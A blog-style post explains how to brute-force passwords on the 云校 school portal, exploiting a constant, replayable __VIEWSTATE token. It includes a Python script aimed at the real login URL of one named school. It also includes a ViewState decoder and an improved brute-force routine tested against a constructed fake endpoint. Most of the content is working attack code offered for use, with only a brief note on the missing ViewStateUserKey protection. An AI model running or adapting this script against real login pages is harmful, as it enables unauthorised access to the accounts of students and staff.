云校 password brute force #1 (no longer works)
When you log in to the 云校 web client, the POST request carries a hidden field (__VIEWSTATE). Reloading the login page repeatedly showed that it never changes; it is always %2FwEPDwUJOTg3MjgxNTE0D2QWBmYPZBYCAgIPZBYCZg8WAh4EVGV4dAUp5Y2B5LiA5a2m5qCh5pWw5a2X5LqR5bmz5Y%2BwLS3nlKjmiLfnmbvlvZVkAgEPZBYCZg8PFgIeCEltYWdlVXJsBTlodHRwOi8vc3RhdGljLmpveXNjaG9vbC5jbi9Db250ZW50L2ltYWdlcy9sb2dvLXNjaG9vbC5wbmdkZAICDxYCHwAFPeWMl%2BS6rOW4guacnemYs%2BWMuuacm%2BS6rFNPSE8g5aGUMSBC5Yy6MjEwOeWupCDpgq7nvJbvvJoxMDAwMjBkZF6BcK3tRyh%2B6XhdWd0vo9N8vIN3
Because the token is constant, the captured POST body can be replayed as-is without fetching the login page first. A password brute force is then simple: send the same request with each candidate password and compare the returned page with the page the server returns for a password known to be wrong; any response that differs means the login took a different path.
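To see what the constant token actually carries, here is an added example (not code from the original post) that decodes the __VIEWSTATE quoted above. It assumes the ASP.NET WebForms ObjectStateFormatter layout (0xFF 0x01 header; string tokens 0x05 and 0x1E followed by a 7-bit-encoded length and UTF-8 bytes); the string scan is a heuristic, not a full ViewState parser, and the reading of the final 20 bytes as an HMAC-SHA1 tag (the default when enableViewStateMac is on) is this example's assumption.

```python
import base64
import urllib.parse

# The __VIEWSTATE value quoted above, exactly as it appears (URL-encoded) in the POST body.
CAPTURED_VIEWSTATE = (
    "%2FwEPDwUJOTg3MjgxNTE0D2QWBmYPZBYCAgIPZBYCZg8WAh4EVGV4dAUp"
    "5Y2B5LiA5a2m5qCh5pWw5a2X5LqR5bmz5Y%2BwLS3nlKjmiLfnmbvlvZVk"
    "AgEPZBYCZg8PFgIeCEltYWdlVXJsBTlodHRwOi8vc3RhdGljLmpveXNjaG9vbC5jbi9Db250ZW50"
    "L2ltYWdlcy9sb2dvLXNjaG9vbC5wbmdkZAICDxYCHwAFPeWMl%2BS6rOW4guacnemYs%2BWMuuacm%2BS6rFNP"
    "SE8g5aGUMSBC5Yy6MjEwOeWupCDpgq7nvJbvvJoxMDAwMjBkZF6BcK3tRyh%2B6XhdWd0vo9N8vIN3"
)

# ObjectStateFormatter token ids that introduce a length-prefixed UTF-8 string
TOKEN_STRING = 0x05
TOKEN_INDEXED_STRING_ADD = 0x1E


def decode_viewstate(encoded: str) -> bytes:
    """URL-decode, then base64-decode, a __VIEWSTATE form value."""
    b64 = urllib.parse.unquote(encoded)
    b64 += "=" * (-len(b64) % 4)  # restore base64 padding lost in copy/paste, if any
    return base64.b64decode(b64)


def viewstate_strings(blob: bytes) -> list:
    """Heuristic scan for string tokens: token byte, 7-bit-encoded length, UTF-8 bytes.
    Enough to read the labels a page stores in its ViewState; not a full parser."""
    out, i = [], 0
    while i < len(blob):
        if blob[i] in (TOKEN_STRING, TOKEN_INDEXED_STRING_ADD):
            n, j, shift = 0, i + 1, 0
            while j < len(blob) and blob[j] & 0x80:  # continuation bytes of the length
                n |= (blob[j] & 0x7F) << shift
                shift += 7
                j += 1
            if j < len(blob):
                n |= blob[j] << shift
                j += 1
                if n and j + n <= len(blob):
                    try:
                        out.append(blob[j:j + n].decode("utf-8"))
                        i = j + n
                        continue
                    except UnicodeDecodeError:
                        pass  # not a real string token; keep scanning
        i += 1
    return out


def viewstate_summary(encoded: str) -> dict:
    blob = decode_viewstate(encoded)
    return {
        # ObjectStateFormatter output starts with the marker bytes 0xFF 0x01
        "objectstate_header": blob[:2] == b"\xff\x01",
        "length": len(blob),
        "strings": viewstate_strings(blob),
        # Assumption: with enableViewStateMac on, a 20-byte HMAC-SHA1 tag is appended,
        # so the last 20 bytes are the MAC rather than page state.
        "mac_candidate": blob[-20:].hex(),
    }


def is_static(samples) -> bool:
    """True when every __VIEWSTATE fetched from the login page is byte-identical,
    i.e. the form can be replayed without loading the page first."""
    return len(set(samples)) == 1


if __name__ == "__main__":
    summary = viewstate_summary(CAPTURED_VIEWSTATE)
    print(summary["objectstate_header"], summary["length"], summary["mac_candidate"])
    for s in summary["strings"]:
        print(repr(s))
```

The decoded token holds only page furniture (the page title, the logo URL, the footer address) plus the MAC. Nothing in it is bound to a session or a request, which is why one captured value can be replayed by anyone. A MAC stops tampering, not replay; what makes the token per-user in ASP.NET is ViewStateUserKey, which is mixed into the MAC, and it was evidently not set here.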
Python code, using 十一学校 (the bnds subdomain) as the example:
    # Python 3 version of the original urllib2 script; the brute-force logic is unchanged.
    import urllib.parse
    import urllib.request

    url = "http://bnds.joyschool.cn/Portal/LayoutD/Login.aspx"
    # The __VIEWSTATE captured from the login form. It never changes, so it is replayed verbatim.
    viewstate = ("%2FwEPDwUJOTg3MjgxNTE0D2QWBmYPZBYCAgIPZBYCZg8WAh4EVGV4dAUp"
                 "5Y2B5LiA5a2m5qCh5pWw5a2X5LqR5bmz5Y%2BwLS3nlKjmiLfnmbvlvZVk"
                 "AgEPZBYCZg8PFgIeCEltYWdlVXJsBTlodHRwOi8vc3RhdGljLmpveXNjaG9vbC5jbi9Db250ZW50"
                 "L2ltYWdlcy9sb2dvLXNjaG9vbC5wbmdkZAICDxYCHwAFPeWMl%2BS6rOW4guacnemYs%2BWMuuacm%2BS6rFNP"
                 "SE8g5aGUMSBC5Yy6MjEwOeWupCDpgq7nvJbvvJoxMDAwMjBkZF6BcK3tRyh%2B6XhdWd0vo9N8vIN3")
    username = "{target username}"  # placeholder: the account to attack

    def login(pwd):
        # Replay the captured POST, changing only the password field
        postdata = ("__VIEWSTATE=" + viewstate
                    + "&txtUserName=" + urllib.parse.quote(username)
                    + "&txtUserPwd=" + urllib.parse.quote(pwd)).encode()
        request = urllib.request.Request(url, data=postdata)
        return urllib.request.urlopen(request).read()

    # Baseline: the page the server returns for a password assumed to be wrong
    content = login("123456")

    for pwd in ["{test password}"]:  # placeholder: the candidate passwords to try
        print(" [*]testing password " + pwd)
        content2 = login(pwd)
        # Any page that differs from the failure page means the login went differently
        if content2 != content:
            print(" [*]Password found!")
            print(" [*]Password:" + pwd)
            break
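To run the comparison technique end to end offline, here is an added example (not the post's code) against a constructed stand-in for Login.aspx. FakeLoginEndpoint, the accounts, the wordlist and the short VIEWSTATE constant are all constructed for the example and are not from the real site. It also handles the blind spot in the script above: the baseline password "123456" might itself be the real password, in which case a single-baseline comparison reports the first wordlist entry as a hit.

```python
import urllib.parse
from collections import Counter
from html import escape

# Constructed for this example: a short stand-in for the real constant __VIEWSTATE.
VIEWSTATE = "/wEPDwUJOTg3MjgxNTE0"


class FakeLoginEndpoint:
    """Constructed stand-in for Login.aspx that behaves the way the post relies on:
    the same __VIEWSTATE is accepted on every request, every wrong password gets the
    identical failure page, and nothing throttles or locks out repeated attempts."""

    def __init__(self, accounts):
        self.accounts = accounts   # constructed test data: username -> password
        self.attempts = 0          # how many POSTs the target has seen

    def post(self, body: str) -> str:
        self.attempts += 1
        form = dict(urllib.parse.parse_qsl(body, keep_blank_values=True))
        if form.get("__VIEWSTATE") != VIEWSTATE:
            return "<html><body>ViewState validation failed</body></html>"
        user, pwd = form.get("txtUserName", ""), form.get("txtUserPwd", "")
        if self.accounts.get(user) == pwd:
            return f"<html><body>Welcome, {escape(user)}</body></html>"
        return ('<html><body>Login failed'
                f'<input type="hidden" name="__VIEWSTATE" value="{escape(VIEWSTATE)}"/>'
                '</body></html>')


def build_body(username: str, pwd: str) -> str:
    """The POST body from the post: the replayed token plus the two login fields."""
    return urllib.parse.urlencode(
        {"__VIEWSTATE": VIEWSTATE, "txtUserName": username, "txtUserPwd": pwd})


def brute_force(post, username, wordlist, probes=("123456", "654321", "111111")):
    """Baseline comparison as in the post, made robust against its blind spot.

    The script above takes the page returned for '123456' as the failure page. If that
    guess happens to be right, every real failure 'differs' from the baseline and the
    first wordlist entry is reported. Here three probe passwords are sent, the page
    returned by the majority is the baseline, and the probes themselves are checked
    against it too, so a correct probe is reported instead of poisoning the baseline.
    Returns the first password whose response differs from the failure page, or None."""
    pages = {p: post(build_body(username, p)) for p in probes}
    baseline, votes = Counter(pages.values()).most_common(1)[0]
    if votes < 2:
        raise RuntimeError("failure page changes from request to request; "
                           "plain response comparison will not work")
    for pwd in list(probes) + list(wordlist):
        page = pages[pwd] if pwd in pages else post(build_body(username, pwd))
        if page != baseline:
            return pwd
    return None


if __name__ == "__main__":
    target = FakeLoginEndpoint({"student01": "qwerty2015"})   # constructed account
    hit = brute_force(target.post, "student01", ["password", "qwerty2015", "letmein"])
    print(f"found {hit!r} after {target.attempts} requests")
```

The majority-vote baseline costs two extra requests and buys two things: a correct probe is reported as the hit, and a failure page that varies per request (a timestamp, a nonce, a rotating token) is detected up front instead of producing a false "Password found!" on the first candidate.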